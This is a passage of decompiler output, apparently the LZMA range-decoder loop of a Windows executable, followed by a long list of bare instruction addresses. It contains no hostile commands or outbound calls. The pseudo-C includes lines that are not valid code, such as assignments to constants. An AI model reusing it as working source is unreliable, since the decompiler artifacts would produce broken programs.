											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                0x00000000
                                                                0x004064dd
                                                                0x004064dd
                                                                0x004064e1
                                                                0x0040650a
                                                                0x00406514
                                                                0x004064e3
                                                                0x004064ec
                                                                0x004064f9
                                                                0x004064fc
                                                                0x00406840
                                                                0x00406840
                                                                0x00406843
                                                                0x00406843
                                                                0x00406843
                                                                0x00406849
                                                                0x0040684f
                                                                0x00406855
                                                                0x0040686f
                                                                0x00406872
                                                                0x00406878
                                                                0x00406883
                                                                0x00406885
                                                                0x00406857
                                                                0x00406857
                                                                0x00406866
                                                                0x0040686a
                                                                0x0040686a
                                                                0x0040688f
                                                                0x00000000
                                                                0x00000000
                                                                0x00406891
                                                                0x00406895
                                                                0x00406a44
                                                                0x00406a5a
                                                                0x00406a62
                                                                0x00406a69
                                                                0x00406a6b
                                                                0x00406a72
                                                                0x00406a76
                                                                0x00406a76
                                                                0x004068a1
                                                                0x004068a8
                                                                0x004068b0
                                                                0x004068b3
                                                                0x004068b6
                                                                0x004068b6
                                                                0x004068bc
                                                                0x004068bc
                                                                0x00406058
                                                                0x00406058
                                                                0x00406058
                                                                0x00406061
                                                                0x00000000
                                                                0x00000000
                                                                0x00406067
                                                                0x00000000
                                                                0x00406072
                                                                0x00000000
                                                                0x00000000
                                                                0x0040607b
                                                                0x0040607e
                                                                0x00406081
                                                                0x00406085
                                                                0x00000000
                                                                0x00000000
                                                                0x0040608b
                                                                0x0040608e
                                                                0x00406090
                                                                0x00406091
                                                                0x00406094
                                                                0x00406096
                                                                0x00406097
                                                                0x00406099
                                                                0x0040609c
                                                                0x004060a1
                                                                0x004060a6
                                                                0x004060af
                                                                0x004060c2
                                                                0x004060c5
                                                                0x004060d1
                                                                0x004060f9
                                                                0x004060fb
                                                                0x00406109
                                                                0x00406109
                                                                0x0040610d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004060fd
                                                                0x004060fd
                                                                0x00406100
                                                                0x00406101
                                                                0x00406101
                                                                0x00000000
                                                                0x004060fd
                                                                0x004060d7
                                                                0x004060dc
                                                                0x004060dc
                                                                0x004060e5
                                                                0x004060ed
                                                                0x004060f0
                                                                0x00000000
                                                                0x004060f6
                                                                0x004060f6
                                                                0x00000000
                                                                0x004060f6
                                                                0x00000000
                                                                0x00406113
                                                                0x00406113
                                                                0x00406117
                                                                0x004069c3
                                                                0x00000000
                                                                0x004069c3
                                                                0x00406120
                                                                0x00406130
                                                                0x00406133
                                                                0x00406136
                                                                0x00406136
                                                                0x00406136
                                                                0x00406139
                                                                0x0040613d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040613f
                                                                0x00406145
                                                                0x0040616f
                                                                0x00406175
                                                                0x0040617c
                                                                0x00000000
                                                                0x0040617c
                                                                0x0040614b
                                                                0x0040614e
                                                                0x00406153
                                                                0x00406153
                                                                0x0040615e
                                                                0x00406166
                                                                0x00406169
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004061ae
                                                                0x004061b4
                                                                0x004061b7
                                                                0x004061c4
                                                                0x004061cc
                                                                0x00406840
                                                                0x00000000
                                                                0x00000000
                                                                0x00406183
                                                                0x00406183
                                                                0x00406187
                                                                0x004069d2
                                                                0x00000000
                                                                0x004069d2
                                                                0x00406193
